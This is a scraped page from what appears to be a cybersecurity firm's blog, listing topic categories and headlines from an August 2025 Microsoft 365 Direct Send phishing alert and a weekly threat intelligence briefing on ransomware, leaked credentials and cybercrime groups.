Why Your Security Culture is Critical to Mitigating Cyber Risk

Governance, Risk and Compliance

Threats

Ransomware, Extortion and Destructive Attacks

Ransomware Victims

Phishing & Email Based Attacks

Other Social Engineering

Fraud, Scams and Financial Crime

Artificial Intelligence

Malware

Mobile

Denial of Service/DoS/DDoS

Internet of Things – IoT

Data Breaches/Leaks

Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain

Insider Risk and Insider Threats

Insurance

Cloud/SaaS

Outages

Identity and Access Management

Encryption

Linux and Open Source

Passwords, Credential Stuffing & Brute Force Attacks

Social Media

Training, Education and Awareness

Regulations, Fines and Legislation

Models, Frameworks and Standards

Careers, Working in Cyber and Information Security

Law Enforcement Action and Take Downs

Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity

Cyber Warfare and Cyber Espionage

Nation State Actors

China

Russia

Iran

North Korea

Tools and Controls

Other News

Vulnerability Management

Vulnerabilities

Sector Specific

Black Arrow Cyber Alert 18 August 2025 – Microsoft 365 Direct Send abuse enabling internal-appearing phishing

Executive summary

What’s the risk to me or my business?

Increased risk of further exploitation through other vulnerabilities

What can I do?

Technical Summary

Further information

Black Arrow Cyber Threat Intelligence Briefing 15 August 2025

Executive Summary

Top Cyber Stories of the Last Week

Over 29,000 Exchange Servers Still Unpatched Against High-Severity Flaw

Nearly Half of Enterprises Tested Had Easily Cracked Passwords

Leaked Credentials Up 160% - What Attackers Are Doing With Them

Ransomware Attacks Up by 41% Globally

Physical Threats to Crypto Owners Hit Record Highs

The UK Cyber Governance Code of Practice: Beyond Basic Protections to Culture, Leadership and Training

The Human Firewall: Building a Cyber-Aware Workforce

Microsoft Warns Organisations Without a Rehearsed Response Plan Are Hit Harder by a Security Incident

Attack Yourself First: the Logic Behind Offensive Security

These Two Ransomware Groups Are Ramping Up Attacks and Have Claimed Hundreds of Victims

Financial Services Could Be Next in Line for ShinyHunters

Three Notorious Cybercrime Gangs, Scattered Spider, ShinyHunters and Lapsus$, Appear to Be Collaborating

Nation State Actor Groups are Getting Personal, Going After Executives in Their Personal Lives

Governance, Risk and Compliance